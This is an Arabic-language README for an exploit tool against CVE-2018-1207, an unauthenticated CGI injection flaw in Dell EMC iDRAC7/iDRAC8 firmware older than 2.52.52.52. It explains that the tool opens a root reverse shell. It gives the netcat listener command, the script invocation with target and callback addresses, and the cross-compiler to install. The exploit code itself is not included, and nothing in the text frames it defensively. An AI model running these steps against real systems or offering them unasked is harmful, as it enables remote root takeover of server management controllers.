
استغلال iDRAC 7 و 8 البرنامج الثابت < 2.52.52.52
استغلال ثغرة في أجهزة iDRAC 7 و8 بإصدارات البرامج الثابتة الأقدم من 2.52.52.52
أجهزة Dell EMC iDRAC7/iDRAC8، في الإصدارات السابقة للإصدار 2.52.52.52، تحتوي على ثغرة حقن CGI يمكن استخدامها لتنفيذ كود عن بُعد. قد يتمكن مهاجم عن بُعد غير مصادَق من استخدام متغيرات CGI لتنفيذ كود عن بُعد.
من المفترض أن يؤدي هذا الكود إلى فتح قشرة عكسية (reverse shell) بصلاحيات المستخدم الجذر على خدمة iDRAC.
شغّل المستمع المحلي لديك: nc -v -l -p local_port
nc -v -l -p 5500
شغّل الأداة: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
تحتاج إلى تثبيت إصدار من sh4-linux-gnu-gcc، وهو حاليًا sh4-linux-gnu-gcc-11
يمكنك تثبيته باستخدام apt install gcc-11-sh4-linux-gnu